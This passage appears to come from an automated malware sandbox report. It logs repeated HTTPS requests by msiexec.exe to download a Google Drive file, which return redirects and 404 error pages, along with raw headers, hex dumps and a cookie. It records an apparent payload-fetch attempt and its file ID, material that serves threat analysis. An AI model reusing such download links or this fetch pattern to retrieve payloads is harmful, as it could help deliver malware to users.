                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-Re72qT7YV72T5BH7qPd32w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          17192.168.2.650000216.58.206.654435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:18 UTC460OUTGET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:19 UTC1851INHTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgQ9lHkpFS77N4rEgXa6aA49OwJJ-ZQyfmoG2DyD3dq--5Y9SpNi0WUah9H2M1gYXvOIFJrwYXk
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:19 GMT
                                                                                          Content-Security-Policy: script-src 'nonce-dNBakqSmJ1oFl3fW4VSayQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:17:19 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 79 2d 36 6e 66 62 4e 6f 6d 44 7a 64 43 53 4f 6f 5a 36 43 46 49 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="y-6nfbNomDzdCSOoZ6CFIg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          18192.168.2.650001142.250.185.1104435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:20 UTC418OUTGET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:20 UTC1920INHTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:20 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-5493ajuU6tJj0hILLc9P4g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          19192.168.2.650002216.58.206.654435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:21 UTC460OUTGET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:21 UTC1844INHTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgRo6JlScXTg9J78hQYE2NSmfkQLdRZa8gVPsiaoWzgt9xCQdrymEhs1tpqahVGLreKm
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:21 GMT
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Security-Policy: script-src 'nonce-pR5fGjb_jCgfyoAsbclkmA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:17:21 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4b 71 41 73 77 42 47 57 65 34 59 79 4e 51 34 78 53 46 69 50 55 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="KqAswBGWe4YyNQ4xSFiPUw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          20192.168.2.650003142.250.185.1104435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:22 UTC418OUTGET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:22 UTC1920INHTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:22 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-Pa7wvJGpjZOG2UgPbJSdSQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          21192.168.2.650004216.58.206.654435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:23 UTC460OUTGET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:23 UTC1844INHTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgSvGNbaSEG31mUVGYDP7Fkg-exoubnQsTpBJumXH91lr2Qlzyn-WvvOQdn9LyQhJzhr
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:23 GMT
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-0lwHe3Ad6m7RVn1Fb9VLzg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:17:23 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4e 36 5f 45 4c 59 51 72 33 4e 30 78 56 75 51 5f 6e 36 52 77 64 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="N6_ELYQr3N0xVuQ_n6Rwdw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          22192.168.2.650005142.250.185.1104435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:24 UTC418OUTGET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:25 UTC1920INHTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:24 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-HRLoYsPC81JXccEHYlJyVg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          23192.168.2.650006216.58.206.654435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:25 UTC460OUTGET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:26 UTC1851INHTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFiumC7LwDHnN5wztW_AYHq2cI0sMnGuhudbvj94l9-uvVET84P0ZXMr3aRMV_oVxRcBdBept_iqLeQ
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:26 GMT
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-gSUTuIqCXvSlkYLUqLgx4A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
